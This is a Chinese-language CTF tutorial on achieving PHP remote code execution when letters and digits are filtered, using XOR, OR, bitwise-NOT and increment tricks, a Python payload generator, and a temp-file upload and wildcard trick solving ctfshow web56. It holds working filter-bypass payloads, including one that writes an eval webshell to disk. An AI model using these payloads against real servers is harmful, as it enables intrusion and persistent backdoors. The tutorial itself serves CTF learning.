无字母数字RCE,就是在字母和数字都被过滤的情况下构造出webshell,进而达到命令执行的目的。

通常,过滤的语句大致写法:

1
2
3
4
5
6
7
8
<?php
	$command = $_GET['w'];
	if (preg_match("/[A-Za-z0-9]+/", $command)){
		die();
	} else {
		eval($command);
	}
?>

其中,正则还可以写成

1
if(preg_match('/^\W+$/', $command))

/^\W+$/中的\W 是一个预定义的字符类,表示 非单词字符,相对的\w表示单词字符

单词字符(\w):

  • 大小写字母 (a-z, A-Z)
  • 数字 (0-9)
  • 下划线 (_)

非单词字符(\W)是上面以外的任何字符,例如:

  • 标点符号(如 !, @, #)
  • 空格、换行符
  • 其他非字母数字的字符

用运算符实现

先上一下表

img

1、 异或运算符

^

两个字符异或操作后,会得到一个新的字符,例如:

h[进行异或操作,得到的结果为3

这是由于,在ascii码表中:

1
2
h: 104 0x68 01101000
[: 91 0x5B 01011011

01101000和01011011逐位进行异或后,得到00110011,也就是0x33,在ascii码中表示是数字3:

1
2
3
4
5
<?php 
	$a = 'h'^'[';
	echo $a;
?> 
// 输出:3

例如像以下这样构造命令:

1
2
3
4
5
6
$__=("#"^"|"); // _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST 
$$__[_]($$__[__]); // $_POST[_]($_POST[__]);

使用时,讲上述构造的命令取消换行,并进行url编码,传入参数即可:

例如:

1
2
3
4
5
6
<?php
	$w = $_GET['w'];
	if (!preg_match("/[a-zA-Z0-9]/"), $w){
		eval($w);
	}
?>

Payload可以写成:

1
?w=%24__%3D(%22%23%22%5E%22%7C%22)%3B%24__.%3D(%22.%22%5E%22~%22)%3B%24__.%3D(%22%2F%22%5E%22%60%22)%3B%24__.%3D(%22%7C%22%5E%22%2F%22)%3B%24__.%3D(%22%7B%22%5E%22%2F%22)%3B%24%24__%5B_%5D(%24%24__%5B__%5D)%3B&_=system&__=whoami

在实际应用中,可以通过python构造出我们需要的命令的异或算式,后续使用这个脚本,只需要修改payload和正则表达式即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import re
import urllib.parse
import requests

def generate_xor_expression(payload, filter_regex):
    """
    根据目标 payload 和过滤正则表达式,生成异或表达式。
    参数:
        payload: 目标字符串
        filter_regex: 用于过滤字符的正则表达式
    返回:
        构造的异或表达式字符串
    """
    xor_1 = ''
    xor_2 = ''
    usable_chars = []
		
    # 找到没有被过滤的可用字符
    for i in range(0xff):
        if chr(i) not in filter_regex:
            usable_chars.append(chr(i))

    # 遍历目标 payload 的每个字符,找到对应的异或字符对
    for k in range(len(payload)):
        for i in usable_chars:
            if chr(ord(i) ^ 127) == payload[k]:  # 检查两个字符异或结果是否等于目标字符
                xor_1 += i
                xor_2 += chr(127)
                continue

    # 构建最终的表达式,将字符进行URL编码
    return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"

# 测试函数
if __name__ == "__main__":
    payload = "ls"  # 要生成的目标 payload
    filter_regex = r'[a-zA-Z0-9]'  # 定义过滤正则表达式
    result = generate_xor_expression(payload, filter_regex)  # 调用函数
    print(result)  # 打印最终生成的表达式

测试:

1
2
3
4
5
6
7
8
9
10
<?php
    $c = $_GET['c'];
    if(!preg_match("/[A-Za-z0-9]+/", $c)) {
        echo 'Yes';
        eval($c);
    } else {
        echo 'No';
    }
    show_source(__FILE__);
?>

构建payload:passthru(ls)

1
('%0F%1E%0C%0C%0B%17%0D%0A'^'%7F%7F%7F%7F%7F%7F%7F%7F')('%13%0C'^'%7F%7F')

image-20250122153948786

2、 或运算符

|

同上异或的原理,不过需要改一下脚本里的运算符

3、 取反

~

1
2
3
4
5
<?php
    $a = 'system';
    $b = ~$a;
    echo urlencode($b);
?>

得到的结果为%8C%86%8C%8B%9A%92,此时将改数据再取反,就可以得到我们想要的system,利用方式和异或部分同理。

4、 自增

利用自增,例如

1
"a"++ => "b"

所以,只要能够得到一个字符,我们就可以通过自增或自减的方式得到所有的字母。那么,要如何得到一个字母,例如A,在PHP中,强制连接数组和字符串的话,数组将会被转化为字符串,其值为“Array”。再取这个字符串的第一个字母,就可以得到A。

1
2
3
<?php
$a = ''.[];
var_dump($a);

image-20250122230523498

还有其他的取字母的方法,例如:

1
2
(0/0).''   //NAN
(1/0).''   //INF

image-20250122230657353

参考佬的payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
$_=[].'';   //得到"Array"
$___ = $_[$__];   //得到"A",$__没有定义,默认为False也即0,此时$___="A"
$__ = $___;   //$__="A"
$_ = $___;   //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"S",此时$__="S"
$___ .= $__;   //$___="AS"
$___ .= $__;   //$___="ASS"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;   //得到"E",此时$__="E"
$___ .= $__;   //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;   //得到"R",此时$__="R"
$___ .= $__;   //$___="ASSER"
$__++;$__++;   //得到"T",此时$__="T"
$___ .= $__;   //$___="ASSERT"
$__ = $_;   //$__="A"
$____ = "_";   //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"P",此时$__="P"
$____ .= $__;   //$____="_P"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"O",此时$__="O"
$____ .= $__;   //$____="_PO"
$__++;$__++;$__++;$__++;   //得到"S",此时$__="S"
$____ .= $__;   //$____="_POS"
$__++;   //得到"T",此时$__="T"
$____ .= $__;   //$____="_POST"
$_ = $$____;   //$_=$_POST
$___($_[_]);   //ASSERT($POST[_])

PHP7和PHP5中的特性

assert是无字母数字RCE中很重要的一个函数,但是php5和php7中的这个函数是有区别的。在php5中,assert是一个函数,因此我们可以动态调用。但是在PHP7中,assert不再是一个函数,而是变成了一个语言结构,不能再作为函数名动态执行代码。在php7中,可以通过($a)()这样的方式来执行命令,也就是说我们对phpinfo取反之后就可以直接执行了,亦或用file_put_contents来写shell。

php7中

例如想执行phpinfo(),可以写成(phpinfo)(),利用取反构造payload:

1
(~%8F%97%8F%96%91%99%90)()		//	phpinfo

image-20250122234018544

甚至可以直接写马file_put_contents('4.php','<?php eval(\$_POST[1]);');

1
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4));

image-20250122234712907

成功写入

image-20250122234742284

php5中

在php5中,不支持用($a)()这样的语句来调用函数,因此需要考虑用一些更巧妙的技巧,参考p神的无字母数字webshell之提高篇(强烈建议仔细读一下)。

其中我阅读后,认为这种绕过方式最主要利用到的特性:

  1. php在处理上传的文件时,会将其保存在临时文件夹下(/tmp),并且默认的文件名为/tmp/phpXXXXXX的形式,文件名的后六位为随机的大小写字母
  2. 可以使用.来执行任意文件,即使这个文件没有执行权限
  3. Linux下的文件可以使用通配符表示

我们在php中上传的文件,会被临时放到tmp目录下并且目录为/tmp/phpXXXXXX,但是只是放到该目录下是达不到我们的目的的,那么就需要想办法执行他。此时就想到了Linux中的..在执行一个文件的时候,不需要改文件具有执行权限,.代表的是当前的shell,. file也就是使用当前的shell来执行file文件。那么结合起来想一下,如果有一个可以进行rce的点,即使是过滤了字母数字的情况下,我们不就可以使用.来执行我们上传的临时文件了吗。

但是又出现问题了,本文不就是在讲无字母数字的情况如何进行rce吗,不能传入字母、数字,要怎么获取到上传的临时文件呢。我们就可以使用通配符,例如/tmp/phpXXXXXX就可以被表示为/???/?????????。

但是,当我们像这样去尝试获取php上传的临时文件时,又出现了问题,有很多能满足/???/?????????匹配格式的文件,以下引用p神的图

img

可以看到,这样的结构,匹配到了这么多文件,而且我们在php中上传生成的临时文件,排到了第6位,那么,在执行. /???/?????????时,就可能在前面的过程中出现问题,然后就导致整个流程终止,无法执行到我们上传的文件。

那么如何解决,仔细观察,可以发现这些列出来的文件中,只有php的临时文件中存在大写字母,并且,在glob通配符中,支持使用[^x]的方法构造表示“这个位置不是字符x”的表达式,因为^在方括号中表示非。一下继续引用p神的图,同理就可以过滤掉很多文件

image.png

那么,同理,我们可以通过表达式,去匹配出文件名中带有大写字母的文件,就是php上传文件后生成的临时文件。查看ascii码表:

image-20250123152043304

可以看到,大写字母在ascii码表上是介于@[这两个符号之间的,那么在表达式中就可以使用[@-[]来表示大写字母

. /???/????????[@-[]

那么payload就可以这么打

1
?><?=`. /???/????????[@-[]`;?>

ctfshow web56

题目:

1
2
3
4
5
6
7
8
9
10
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

其中,传入的参数$c已经会被system执行了,就可以简化上面说的payload中的反引号。先构造个页面向题目的服务器上传文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <title></title>
</head>
<body>
    <form action="https://8e4b11f5-31db-4e4c-985b-87e22a12ae16.challenge.ctf.show/" method="post" enctype="multipart/form-data">
        <input type="file" name="file" />
        <input type="submit" value="submit" />
    </form>
</body>
</html>

image-20250123153109598

上传后,使用参数c尝试读这个文件

image-20250123153619574

成功执行。如果一次执行了,发现没有成功执行我们的命令,可以多尝试几次,总有一次会匹配到文件最后一位是大写字母,就可以匹配到临时文件,反正最后一位是不是大写字母也就是50%的概率。

写在最后

记得第一次接触到无字母数字RCE,就是小一届的一位师傅来问我ctfshow的web56这题,当时看了一圈wp也是一头雾水,后面静下心来好好看了p神的文章才弄懂,然后在CSDN写了一篇博客与那位师傅分享,有时候花很长的时间捋清楚一个大佬们的骚操作,还是会很有成就感的。也是一个很好的,从别人的提问中学习的例子。多阅读大佬们的博客,多学习一些很巧妙的技巧,学会从别人那里获取知识并吸收,还是很重要的。

参考

https://arsenetang.github.io/2021/07/28/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97rce/

https://www.52pojie.cn/thread-1527477-1-1.html

https://xz.aliyun.com/t/11929?time__1311=Cq0xuD2Dg0i%3DDsD7zAhOn%2B34GK40INt3x

https://xz.aliyun.com/t/8107?time__1311=n4%2BxnD0Dc7GQDtDkWGODlhje0%3Dn1%3DrrxRiTD